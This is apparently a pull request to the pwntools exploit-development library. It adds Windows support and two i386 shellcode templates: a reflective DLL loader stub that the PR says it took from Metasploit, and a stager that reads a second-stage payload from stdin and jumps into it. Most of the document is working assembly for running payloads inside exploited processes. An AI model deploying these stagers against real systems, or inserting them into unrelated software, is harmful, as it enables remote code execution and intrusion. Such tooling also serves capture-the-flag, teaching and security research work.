### PR TITLE
Windows loader for greenhornd

### DIFF
--- a/pwnlib/context.py
+++ b/pwnlib/context.py
@@ -23,7 +23,7 @@ __possible__ = {
     ),
     'arch32': ('arm', 'armeb', 'cris', 'i386', 'm68k', 'mips', 'mipsel', 'thumb'),
     'arch64': ('alpha', 'amd64'),
-    'os': ('linux', 'freebsd')
+    'os': ('linux', 'freebsd', 'windows')
 }
 
 class Local(object):

--- a/pwnlib/shellcraft/templates/i386/windows/__doc__
+++ b/pwnlib/shellcraft/templates/i386/windows/__doc__
@@ -1,0 +1,1 @@
+Shellcraft module containing Windows i386 shellcodes.

--- a/pwnlib/shellcraft/templates/i386/windows/peloader.asm
+++ b/pwnlib/shellcraft/templates/i386/windows/peloader.asm
@@ -1,0 +1,26 @@
+<% from pwnlib.shellcraft import common %>
+<%page args="ReflectiveLoader"/>
+<%docstring>
+PE loader stolen from metasploit.
+    ReflectiveLoader = Offset into PE of routine to call
+</%docstring>
+
+MZ:
+    dec ebp                        ; M
+    pop edx                        ; Z
+    call OFFSET                    ; call next instruction
+OFFSET:
+    pop ebx                        ; get our location (+7)
+    push edx                       ; push edx back
+    inc ebp                        ; restore ebp
+    push ebp                       ; save ebp
+    mov ebp, esp                   ; setup fresh stack frame
+                                   ; add offset to ReflectiveLoader
+    add ebx, ${ReflectiveLoader}-(OFFSET-MZ)
+    call ebx                       ; call ReflectiveLoader
+    mov ebx, eax                   ; save DllMain for second call
+    push edi                       ; our socket
+    push 0x4                       ; signal we have attached
+    push eax                       ; some value for hinstance
+    call eax                       ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
+

--- a/pwnlib/shellcraft/templates/i386/windows/stdin_stage.asm
+++ b/pwnlib/shellcraft/templates/i386/windows/stdin_stage.asm
@@ -1,8 +1,8 @@
 <% from pwnlib.shellcraft import common %>
 <%page args="ReadFile, GetStdHandle, Size = '0x1000', Target = '0'"/>
 <%docstring>
-Fucked read because I'm too lazy to do GetProcAddress.
-    ReadFile, GetStdHandle, Size = '0x1000', Target = '0'
+Calls ReadFile(GetStdHandle(STD_INPUT_HANDLE), Target, Size, ...)
+    By default, 'Target' will be the address that comes after this stage.
 </%docstring>
 
 

--- a/pwnlib/shellcraft/templates/i386/windows/stdin_stage.asm
+++ b/pwnlib/shellcraft/templates/i386/windows/stdin_stage.asm
@@ -1,0 +1,50 @@
+<% from pwnlib.shellcraft import common %>
+<%page args="ReadFile, GetStdHandle, Size = '0x1000', Target = '0'"/>
+<%docstring>
+Fucked read because I'm too lazy to do GetProcAddress.
+    ReadFile, GetStdHandle, Size = '0x1000', Target = '0'
+</%docstring>
+
+
+    ; EBX = GetStdHandle(STD_INPUT_HANDLE)
+        push -10
+        mov eax, ${GetStdHandle}
+        call [eax]
+        mov edi, eax    ; EDI = File
+
+    % if Target == '0':
+        jmp PUSH_STAGE
+PUSHED_STAGE:
+    % else:
+        push ${Target}  ; lpBuffer
+    % endif
+        pop ebx         ; EBX = Buffer Position
+        xor ebp, ebp    ; EBP = Total Bytes
+
+        push 0          ; ESI = NumberOfBytesRead
+        mov esi, esp
+
+LOOP:
+    ; ReadFile(Stdin, Target, 1, &NumberOfBytesRead, 0)
+        push 0          ; lpOverlapped
+        push esi        ; &(NumberOfBytesRead)
+        push 1          ; NumberOfBytesToRead
+        push ebx        ; pBuffer
+        push edi        ; hFile
+        mov eax, ${ReadFile}
+        call [eax]
+
+    ; TotalBytes += NumberOfBytesRead
+    ; Buffer     += NumberOfBytesRead
+        add ebp, [esi]
+        add ebx, [esi]
+
+        cmp ebp, ${Size}
+        jnz LOOP
+
+        mov ebp, esp
+        jmp STAGE
+
+PUSH_STAGE:
+        call PUSHED_STAGE
+STAGE:


### PR DESCRIPTION
Steal the executable MZ header from [Metasploit](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reflectivedllinject.rb#L59).

Add a stager shellcode for stdin, given that the IAT addresses of `ReadFile` and `GetStdHandle` are known.